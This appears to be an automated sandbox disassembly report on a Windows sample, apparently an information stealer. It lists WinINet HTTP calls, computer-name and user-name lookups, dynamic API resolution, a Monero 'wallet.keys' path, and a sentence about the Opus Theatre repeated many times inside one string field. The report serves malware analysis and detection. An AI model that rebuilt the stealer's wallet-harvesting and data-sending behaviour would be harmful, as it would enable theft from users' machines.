                          • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                          • API String ID: 1542196881-2218711628
                          • Opcode ID: c83dc9dc944c1df92fdd70778a185d08e1b37407b1311d5184a3d4301360fed6
                          • Instruction ID: 216382ec7d323667c8356f0ebcdea99ad500838a353e3c0e0754db9dfa2a760d
                          • Opcode Fuzzy Hash: c83dc9dc944c1df92fdd70778a185d08e1b37407b1311d5184a3d4301360fed6
                          • Instruction Fuzzy Hash: AA41F3607EB70DABCE74FBA4984EEED77A25F86710FD85088EC4092294CBB055C4C52E
                          Function 00AF4880 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479networkstringfileCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 801 af4880-af4942 call b0a7a0 call af47b0 call b0a740 * 5 InternetOpenA StrCmpCA 816 af494b-af494f 801->816 817 af4944 801->817 818 af4ecb-af4ef3 InternetCloseHandle call b0aad0 call af9ac0 816->818 819 af4955-af4acd call b08b60 call b0a920 call b0a8a0 call b0a800 * 2 call b0a9b0 call b0a8a0 call b0a800 call b0a9b0 call b0a8a0 call b0a800 call b0a920 call b0a8a0 call b0a800 call b0a9b0 call b0a8a0 call b0a800 call b0a9b0 call b0a8a0 call b0a800 call b0a9b0 call b0a920 call b0a8a0 call b0a800 * 2 InternetConnectA 816->819 817->816 829 af4ef5-af4f2d call b0a820 call b0a9b0 call b0a8a0 call b0a800 818->829 830 af4f32-af4fa2 call b08990 * 2 call b0a7a0 call b0a800 * 8 818->830 819->818 905 af4ad3-af4ad7 819->905 829->830 906 af4ad9-af4ae3 905->906 907 af4ae5 905->907 908 af4aef-af4b22 HttpOpenRequestA 906->908 907->908 909 af4ebe-af4ec5 InternetCloseHandle 908->909 910 af4b28-af4e28 call b0a9b0 call b0a8a0 call b0a800 call b0a920 call b0a8a0 call b0a800 call b0a9b0 call b0a8a0 call b0a800 call b0a9b0 call b0a8a0 call b0a800 call b0a9b0 call b0a8a0 call b0a800 call b0a9b0 call b0a8a0 call b0a800 call b0a920 call b0a8a0 call b0a800 call b0a9b0 call b0a8a0 call b0a800 call b0a9b0 call b0a8a0 call b0a800 call b0a920 call b0a8a0 call b0a800 call b0a9b0 call b0a8a0 call b0a800 call b0a9b0 call b0a8a0 call b0a800 call b0a9b0 call b0a8a0 call b0a800 call b0a9b0 call b0a8a0 call b0a800 call b0a920 call b0a8a0 call b0a800 call b0a740 call b0a920 * 2 call b0a8a0 call b0a800 * 2 call b0aad0 lstrlen call b0aad0 * 2 lstrlen call b0aad0 HttpSendRequestA 908->910 909->818 1021 af4e32-af4e5c InternetReadFile 910->1021 1022 af4e5e-af4e65 1021->1022 1023 af4e67-af4eb9 InternetCloseHandle call b0a800 1021->1023 1022->1023 1024 af4e69-af4ea7 call b0a9b0 call b0a8a0 call b0a800 1022->1024 1023->909 1024->1021
                          APIs
                            • Part of subcall function 00B0A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00B0A7E6
                            • Part of subcall function 00AF47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00AF4839
                            • Part of subcall function 00AF47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00AF4849
                            • Part of subcall function 00B0A740: lstrcpy.KERNEL32(00B10E17,00000000), ref: 00B0A788
                          • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00AF4915
                          • StrCmpCA.SHLWAPI(?,018AFBE0), ref: 00AF493A
                          • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00AF4ABA
                          • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00B10DDB,00000000,?,?,00000000,?,",00000000,?,018AFCD0), ref: 00AF4DE8
                          • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00AF4E04
                          • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00AF4E18
                          • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00AF4E49
                          • InternetCloseHandle.WININET(00000000), ref: 00AF4EAD
                          • InternetCloseHandle.WININET(00000000), ref: 00AF4EC5
                          • HttpOpenRequestA.WININET(00000000,018AFBF0,?,018AF500,00000000,00000000,00400100,00000000), ref: 00AF4B15
                            • Part of subcall function 00B0A9B0: lstrlen.KERNEL32(?,018A89C8,?,\Monero\wallet.keys,00B10E17), ref: 00B0A9C5
                            • Part of subcall function 00B0A9B0: lstrcpy.KERNEL32(00000000), ref: 00B0AA04
                            • Part of subcall function 00B0A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00B0AA12
                            • Part of subcall function 00B0A8A0: lstrcpy.KERNEL32(?,00B10E17), ref: 00B0A905
                            • Part of subcall function 00B0A920: lstrcpy.KERNEL32(00000000,?), ref: 00B0A972
                            • Part of subcall function 00B0A920: lstrcat.KERNEL32(00000000), ref: 00B0A982
                          • InternetCloseHandle.WININET(00000000), ref: 00AF4ECF
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          • Associated: 00000000.00000002.2180712635.0000000000AF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000D3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000D4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000EC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2181799912.0000000000FE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182346954.0000000001179000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182459052.000000000117A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                          • String ID: "$"$------$------$------
                          • API String ID: 460715078-2180234286
                          • Opcode ID: a1a8b3f1e11908c1f73529fbc1ee02b4cebbfc15469f9e135cc524260d379f53
                          • Instruction ID: ef2f7745518df92a22dc1186b79ddbe10c005c94baa3f09eced3c3969c8072e7
                          • Opcode Fuzzy Hash: a1a8b3f1e11908c1f73529fbc1ee02b4cebbfc15469f9e135cc524260d379f53
                          • Instruction Fuzzy Hash: F512AA71910318AADB15EB94DD92FEEBBB8AF14300F5085D9B106B20D1EF706F49CB62
                          Function 00B078E0 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00B07910
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00B07917
                          • GetComputerNameA.KERNEL32(?,00000104), ref: 00B0792F
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          • Associated: 00000000.00000002.2180712635.0000000000AF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000D3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000D4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000EC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2181799912.0000000000FE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182346954.0000000001179000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182459052.000000000117A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateComputerNameProcess
                          • String ID:
                          • API String ID: 1664310425-0
                          • Opcode ID: 510e42a944ba5cb74a2280f0687e65acb802f93da8f0d479a50dff604011fd7c
                          • Instruction ID: b06dba6283df65accc9f797a1adc5f4253604eb18f1bbd7c4f4714be2e6f3352
                          • Opcode Fuzzy Hash: 510e42a944ba5cb74a2280f0687e65acb802f93da8f0d479a50dff604011fd7c
                          • Instruction Fuzzy Hash: C3011DB1A44209EFC710DF99DD45BAAFBF8FB04B21F10429AFA45E23D0D77469448BA1
                          Function 00B07850 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00AF11B7), ref: 00B07880
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00B07887
                          • GetUserNameA.ADVAPI32(00000104,00000104), ref: 00B0789F
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          • Associated: 00000000.00000002.2180712635.0000000000AF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000D3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000D4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000EC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2181799912.0000000000FE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182346954.0000000001179000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182459052.000000000117A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateNameProcessUser
                          • String ID:
                          • API String ID: 1296208442-0
                          • Opcode ID: 013bfed2eb1f1c46dd8afa08cdd77e0ff797b5eacc715e6f5d09db83bcfdfa04
                          • Instruction ID: 191bda980c41e6d0a3de3475d550c98db266eff7fd7d766aeaa06307ae4eb328
                          • Opcode Fuzzy Hash: 013bfed2eb1f1c46dd8afa08cdd77e0ff797b5eacc715e6f5d09db83bcfdfa04
                          • Instruction Fuzzy Hash: 53F04FB1E44208ABC700DF99DD49BAEFBB8EB04721F10025AFA05E27C0C7B419048BA1
                          Function 00AF1160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          • Associated: 00000000.00000002.2180712635.0000000000AF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000D3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000D4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000EC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2181799912.0000000000FE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182346954.0000000001179000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182459052.000000000117A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExitInfoProcessSystem
                          • String ID:
                          • API String ID: 752954902-0
                          • Opcode ID: ab884df28ed3231a6644d002dbd9443a10131646d35f340f975c1098ff17046f
                          • Instruction ID: c59c88f59c108729aeb567d272035c5d7cdf199c61144622fcd69c40bfd23800
                          • Opcode Fuzzy Hash: ab884df28ed3231a6644d002dbd9443a10131646d35f340f975c1098ff17046f
                          • Instruction Fuzzy Hash: 07D05EB4A0030CDBCB00DFE4DC896EDBB78FB08321F000658E905A2340EA315491CAB6
                          Function 00B09C10 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684libraryloaderCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 633 b09c10-b09c1a 634 b09c20-b0a031 GetProcAddress * 43 633->634 635 b0a036-b0a0ca LoadLibraryA * 8 633->635 634->635 636 b0a146-b0a14d 635->636 637 b0a0cc-b0a141 GetProcAddress * 5 635->637 638 b0a153-b0a211 GetProcAddress * 8 636->638 639 b0a216-b0a21d 636->639 637->636 638->639 640 b0a298-b0a29f 639->640 641 b0a21f-b0a293 GetProcAddress * 5 639->641 642 b0a2a5-b0a332 GetProcAddress * 6 640->642 643 b0a337-b0a33e 640->643 641->640 642->643 644 b0a344-b0a41a GetProcAddress * 9 643->644 645 b0a41f-b0a426 643->645 644->645 646 b0a4a2-b0a4a9 645->646 647 b0a428-b0a49d GetProcAddress * 5 645->647 648 b0a4ab-b0a4d7 GetProcAddress * 2 646->648 649 b0a4dc-b0a4e3 646->649 647->646 648->649 650 b0a515-b0a51c 649->650 651 b0a4e5-b0a510 GetProcAddress * 2 649->651 652 b0a612-b0a619 650->652 653 b0a522-b0a60d GetProcAddress * 10 650->653 651->650 654 b0a61b-b0a678 GetProcAddress * 4 652->654 655 b0a67d-b0a684 652->655 653->652 654->655 656 b0a686-b0a699 GetProcAddress 655->656 657 b0a69e-b0a6a5 655->657 656->657 658 b0a6a7-b0a703 GetProcAddress * 4 657->658 659 b0a708-b0a709 657->659 658->659
                          APIs
                          • GetProcAddress.KERNEL32(76210000,01894FE8), ref: 00B09C2D
                          • GetProcAddress.KERNEL32(76210000,01895148), ref: 00B09C45
                          • GetProcAddress.KERNEL32(76210000,018A9028), ref: 00B09C5E
                          • GetProcAddress.KERNEL32(76210000,018A9040), ref: 00B09C76
                          • GetProcAddress.KERNEL32(76210000,018A9058), ref: 00B09C8E
                          • GetProcAddress.KERNEL32(76210000,018ADCA0), ref: 00B09CA7
                          • GetProcAddress.KERNEL32(76210000,0189A720), ref: 00B09CBF
                          • GetProcAddress.KERNEL32(76210000,018ADD30), ref: 00B09CD7
                          • GetProcAddress.KERNEL32(76210000,018ADD00), ref: 00B09CF0
                          • GetProcAddress.KERNEL32(76210000,018ADC88), ref: 00B09D08
                          • GetProcAddress.KERNEL32(76210000,018ADCB8), ref: 00B09D20
                          • GetProcAddress.KERNEL32(76210000,018950E8), ref: 00B09D39
                          • GetProcAddress.KERNEL32(76210000,018951C8), ref: 00B09D51
                          • GetProcAddress.KERNEL32(76210000,01895008), ref: 00B09D69
                          • GetProcAddress.KERNEL32(76210000,01895108), ref: 00B09D82
                          • GetProcAddress.KERNEL32(76210000,018ADB08), ref: 00B09D9A
                          • GetProcAddress.KERNEL32(76210000,018ADC70), ref: 00B09DB2
                          • GetProcAddress.KERNEL32(76210000,0189A770), ref: 00B09DCB
                          • GetProcAddress.KERNEL32(76210000,01894F48), ref: 00B09DE3
                          • GetProcAddress.KERNEL32(76210000,018ADB98), ref: 00B09DFB
                          • GetProcAddress.KERNEL32(76210000,018ADCD0), ref: 00B09E14
                          • GetProcAddress.KERNEL32(76210000,018ADD48), ref: 00B09E2C
                          • GetProcAddress.KERNEL32(76210000,018ADBB0), ref: 00B09E44
                          • GetProcAddress.KERNEL32(76210000,018952C8), ref: 00B09E5D
                          • GetProcAddress.KERNEL32(76210000,018ADD90), ref: 00B09E75
                          • GetProcAddress.KERNEL32(76210000,018ADD78), ref: 00B09E8D
                          • GetProcAddress.KERNEL32(76210000,018ADCE8), ref: 00B09EA6
                          • GetProcAddress.KERNEL32(76210000,018ADD18), ref: 00B09EBE
                          • GetProcAddress.KERNEL32(76210000,018ADAC0), ref: 00B09ED6
                          • GetProcAddress.KERNEL32(76210000,018ADAD8), ref: 00B09EEF
                          • GetProcAddress.KERNEL32(76210000,018ADC28), ref: 00B09F07
                          • GetProcAddress.KERNEL32(76210000,018ADBC8), ref: 00B09F1F
                          • GetProcAddress.KERNEL32(76210000,018ADB20), ref: 00B09F38
                          • GetProcAddress.KERNEL32(76210000,0189FA48), ref: 00B09F50
                          • GetProcAddress.KERNEL32(76210000,018ADD60), ref: 00B09F68
                          • GetProcAddress.KERNEL32(76210000,018ADB38), ref: 00B09F81
                          • GetProcAddress.KERNEL32(76210000,018952E8), ref: 00B09F99
                          • GetProcAddress.KERNEL32(76210000,018ADB68), ref: 00B09FB1
                          • GetProcAddress.KERNEL32(76210000,01895308), ref: 00B09FCA
                          • GetProcAddress.KERNEL32(76210000,018ADBE0), ref: 00B09FE2
                          • GetProcAddress.KERNEL32(76210000,018ADB80), ref: 00B09FFA
                          • GetProcAddress.KERNEL32(76210000,01894F88), ref: 00B0A013
                          • GetProcAddress.KERNEL32(76210000,01895128), ref: 00B0A02B
                          • LoadLibraryA.KERNEL32(018ADB50,?,00B05CA3,00B10AEB,?,?,?,?,?,?,?,?,?,?,00B10AEA,00B10AE3), ref: 00B0A03D
                          • LoadLibraryA.KERNEL32(018ADDA8,?,00B05CA3,00B10AEB,?,?,?,?,?,?,?,?,?,?,00B10AEA,00B10AE3), ref: 00B0A04E
                          • LoadLibraryA.KERNEL32(018ADBF8,?,00B05CA3,00B10AEB,?,?,?,?,?,?,?,?,?,?,00B10AEA,00B10AE3), ref: 00B0A060
                          • LoadLibraryA.KERNEL32(018ADC10,?,00B05CA3,00B10AEB,?,?,?,?,?,?,?,?,?,?,00B10AEA,00B10AE3), ref: 00B0A072
                          • LoadLibraryA.KERNEL32(018ADAF0,?,00B05CA3,00B10AEB,?,?,?,?,?,?,?,?,?,?,00B10AEA,00B10AE3), ref: 00B0A083
                          • LoadLibraryA.KERNEL32(018ADC40,?,00B05CA3,00B10AEB,?,?,?,?,?,?,?,?,?,?,00B10AEA,00B10AE3), ref: 00B0A095
                          • LoadLibraryA.KERNEL32(018ADC58,?,00B05CA3,00B10AEB,?,?,?,?,?,?,?,?,?,?,00B10AEA,00B10AE3), ref: 00B0A0A7
                          • LoadLibraryA.KERNEL32(018ADE50,?,00B05CA3,00B10AEB,?,?,?,?,?,?,?,?,?,?,00B10AEA,00B10AE3), ref: 00B0A0B8
                          • GetProcAddress.KERNEL32(751E0000,018951E8), ref: 00B0A0DA
                          • GetProcAddress.KERNEL32(751E0000,018ADE68), ref: 00B0A0F2
                          • GetProcAddress.KERNEL32(751E0000,018A8C68), ref: 00B0A10A
                          • GetProcAddress.KERNEL32(751E0000,018ADE80), ref: 00B0A123
                          • GetProcAddress.KERNEL32(751E0000,01895288), ref: 00B0A13B
                          • GetProcAddress.KERNEL32(701C0000,0189A6F8), ref: 00B0A160
                          • GetProcAddress.KERNEL32(701C0000,018956E8), ref: 00B0A179
                          • GetProcAddress.KERNEL32(701C0000,0189A5B8), ref: 00B0A191
                          • GetProcAddress.KERNEL32(701C0000,018ADE98), ref: 00B0A1A9
                          • GetProcAddress.KERNEL32(701C0000,018ADEB0), ref: 00B0A1C2
                          • GetProcAddress.KERNEL32(701C0000,01895668), ref: 00B0A1DA
                          • GetProcAddress.KERNEL32(701C0000,018954A8), ref: 00B0A1F2
                          • GetProcAddress.KERNEL32(701C0000,018ADE38), ref: 00B0A20B
                          • GetProcAddress.KERNEL32(753A0000,01895468), ref: 00B0A22C
                          • GetProcAddress.KERNEL32(753A0000,018954C8), ref: 00B0A244
                          • GetProcAddress.KERNEL32(753A0000,018ADEF8), ref: 00B0A25D
                          • GetProcAddress.KERNEL32(753A0000,018ADF40), ref: 00B0A275
                          • GetProcAddress.KERNEL32(753A0000,01895408), ref: 00B0A28D
                          • GetProcAddress.KERNEL32(76310000,0189A810), ref: 00B0A2B3
                          • GetProcAddress.KERNEL32(76310000,0189A838), ref: 00B0A2CB
                          • GetProcAddress.KERNEL32(76310000,018ADF10), ref: 00B0A2E3
                          • GetProcAddress.KERNEL32(76310000,018955A8), ref: 00B0A2FC
                          • GetProcAddress.KERNEL32(76310000,018955E8), ref: 00B0A314
                          • GetProcAddress.KERNEL32(76310000,0189A8B0), ref: 00B0A32C
                          • GetProcAddress.KERNEL32(76910000,018ADEC8), ref: 00B0A352
                          • GetProcAddress.KERNEL32(76910000,01895348), ref: 00B0A36A
                          • GetProcAddress.KERNEL32(76910000,018A8B88), ref: 00B0A382
                          • GetProcAddress.KERNEL32(76910000,018ADF28), ref: 00B0A39B
                          • GetProcAddress.KERNEL32(76910000,018ADE08), ref: 00B0A3B3
                          • GetProcAddress.KERNEL32(76910000,01895488), ref: 00B0A3CB
                          • GetProcAddress.KERNEL32(76910000,01895548), ref: 00B0A3E4
                          • GetProcAddress.KERNEL32(76910000,018ADF58), ref: 00B0A3FC
                          • GetProcAddress.KERNEL32(76910000,018ADE20), ref: 00B0A414
                          • GetProcAddress.KERNEL32(75B30000,01895448), ref: 00B0A436
                          • GetProcAddress.KERNEL32(75B30000,018ADEE0), ref: 00B0A44E
                          • GetProcAddress.KERNEL32(75B30000,018ADF70), ref: 00B0A466
                          • GetProcAddress.KERNEL32(75B30000,018ADDC0), ref: 00B0A47F
                          • GetProcAddress.KERNEL32(75B30000,018ADDD8), ref: 00B0A497
                          • GetProcAddress.KERNEL32(75670000,01895628), ref: 00B0A4B8
                          • GetProcAddress.KERNEL32(75670000,018954E8), ref: 00B0A4D1
                          • GetProcAddress.KERNEL32(76AC0000,018953E8), ref: 00B0A4F2
                          • GetProcAddress.KERNEL32(76AC0000,018ADDF0), ref: 00B0A50A
                          • GetProcAddress.KERNEL32(6F4E0000,01895608), ref: 00B0A530
                          • GetProcAddress.KERNEL32(6F4E0000,01895428), ref: 00B0A548
                          • GetProcAddress.KERNEL32(6F4E0000,01895388), ref: 00B0A560
                          • GetProcAddress.KERNEL32(6F4E0000,018AD808), ref: 00B0A579
                          • GetProcAddress.KERNEL32(6F4E0000,01895648), ref: 00B0A591
                          • GetProcAddress.KERNEL32(6F4E0000,01895368), ref: 00B0A5A9
                          • GetProcAddress.KERNEL32(6F4E0000,01895508), ref: 00B0A5C2
                          • GetProcAddress.KERNEL32(6F4E0000,018956C8), ref: 00B0A5DA
                          • GetProcAddress.KERNEL32(6F4E0000,InternetSetOptionA), ref: 00B0A5F1
                          • GetProcAddress.KERNEL32(6F4E0000,HttpQueryInfoA), ref: 00B0A607
                          • GetProcAddress.KERNEL32(75AE0000,018AD8E0), ref: 00B0A629
                          • GetProcAddress.KERNEL32(75AE0000,018A8B98), ref: 00B0A641
                          • GetProcAddress.KERNEL32(75AE0000,018AD898), ref: 00B0A659
                          • GetProcAddress.KERNEL32(75AE0000,018AD9E8), ref: 00B0A672
                          • GetProcAddress.KERNEL32(76300000,01895528), ref: 00B0A693
                          • GetProcAddress.KERNEL32(6FE30000,018AD838), ref: 00B0A6B4
